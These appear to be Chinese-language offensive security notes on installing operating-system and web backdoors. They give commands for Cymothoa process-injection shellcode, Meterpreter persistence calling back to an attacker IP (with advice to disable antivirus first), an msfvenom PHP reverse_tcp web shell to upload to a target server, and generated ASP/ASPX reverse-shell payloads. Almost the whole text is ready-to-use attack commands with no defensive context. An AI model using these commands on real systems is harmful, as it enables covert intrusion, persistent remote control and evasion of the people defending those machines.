backdoor

操作系统后门

Cymothoa后门

https://github.com/jorik041/cymothoa

这是一款可以将ShellCode注入到现有进程,返回注入进程权限shell的后门工具。

与被注入进程共存,只要系统防护人员不检测内存就发现不了。

1)查看程序PID

Linux: ps -aux

cymothoa -p 882 -s 1 4444 # -p指定被注入进程PID,-s 指定ShellCode编号

nc -nvv 192.168.1.101 4444 #连接目标主机后门

Persistence后门

这是一种安装自启动方式的后门

Meterpreter > run persistence -h #查看所有命令选项

1545657629964
run persistence -A -S -U -i 60 -p 4321 -r 攻击者IP

生成新的meterpreter session

会触发杀软,使用前先关闭杀软

Web后门

PHP后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=攻击IP -f raw > main.php

上传到目标服务器

攻击者启动handler监听,打开http://IP/main.php 反弹shell

Aspx后门

use windows/shell_reverse_tcp
info
set LHOST IP
set LPORT 3321
save
generate -t asp #生成asp版本
generate -t aspx #生成apsx版本

上传,然后和PHP版本的操作一样。